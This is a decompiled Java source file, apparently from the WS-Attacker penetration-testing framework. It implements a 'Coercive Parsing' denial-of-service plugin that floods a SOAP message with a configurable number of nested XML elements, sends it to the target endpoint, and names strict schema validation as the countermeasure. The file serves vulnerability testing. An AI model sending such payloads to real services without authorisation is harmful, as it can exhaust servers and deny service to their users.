/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos;

import java.util.HashMap;
import java.util.Map;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionInteger;
import wsattacker.main.plugin.option.OptionLimitedInteger;
import wsattacker.main.plugin.option.OptionSimpleVarchar;
import wsattacker.plugin.dos.dosExtension.abstractPlugin.AbstractDosPlugin;
import wsattacker.plugin.dos.dosExtension.option.OptionTextAreaSoapMessage;

public class CoerciveParsing
extends AbstractDosPlugin {
    private static final long serialVersionUID = 1L;
    private AbstractOptionInteger optionNumberTags;
    private OptionSimpleVarchar optionTag;

    @Override
    public void initializeDosPlugin() {
        this.initData();
        this.optionNumberTags = new OptionLimitedInteger("Number of nested elements", 1500, "Number of nested elements. E.g. '3' means <X><X><X></X></X></X>", 0, 147483647);
        this.optionTag = new OptionSimpleVarchar("Element name", "X", "Element name (will be placed between < and >)");
        this.getPluginOptions().add((AbstractOption)this.optionNumberTags);
        this.getPluginOptions().add((AbstractOption)this.optionTag);
    }

    public AbstractOptionInteger getOptionNumberTags() {
        return this.optionNumberTags;
    }

    public OptionSimpleVarchar getOptionTag() {
        return this.optionTag;
    }

    @Override
    public OptionTextAreaSoapMessage.PayloadPosition getPayloadPosition() {
        return OptionTextAreaSoapMessage.PayloadPosition.HEADERLASTCHILDELEMENT;
    }

    public void initData() {
        this.setName("Coercive Parsing");
        this.setDescription("<html><p>This attack plugin checks if the server is vulnerable to a \"Coercive Parsing Attack\".</p><p>The attack algorithm replaces the string $$PAYLOADELEMENT$$ in the SOAP message below with the defined number of nested elements. The placeholder $$PAYLOADELEMENT$$ can be set to any other position in the SOAP messageThe number of nested elements is defined in \"Param 8 - number elements\". The element name of the nested elements is defined in \"Param 9 - element name\", i.e. if you choose \"X\" as an element name, each element has a size of 7 bytes.This would result in the following filesizes:\n~ 150000 Tags result in a 1 mb file <ul><li>~  75000 Tags result in a 0.5 mb file </li><li>~  15000 Tags result in a 0.1 mb file</li><li>~   7500 Tags result in a 0.05 mb file</li></ul></p></html>");
        this.setCountermeasures("The \"Coercive Parsing\" attack can be fully stopped by using strict schema validation. Each WSDL should contain a detailed description of the used elements, attributes, and data types. More Information: http://clawslab.nds.rub.de/wiki/index.php/Coercive_Parsing");
    }

    @Override
    public void createTamperedRequest() {
        int i;
        String elementNameOpen = "<" + this.optionTag.getValue() + ">";
        String elementNameClose = "</" + this.optionTag.getValue() + ">";
        StringBuilder sb = new StringBuilder();
        for (i = 0; i < this.optionNumberTags.getValue(); ++i) {
            sb.append(elementNameOpen);
        }
        for (i = 0; i < this.optionNumberTags.getValue(); ++i) {
            sb.append(elementNameClose);
        }
        String soapMessage = this.getOptionTextAreaSoapMessage().getValue();
        String soapMessageFinal = this.getOptionTextAreaSoapMessage().replacePlaceholderWithPayload(soapMessage, sb.toString());
        HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
        for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
            httpHeaderMap.put(entry.getKey(), entry.getValue());
        }
        this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), soapMessageFinal);
    }
}

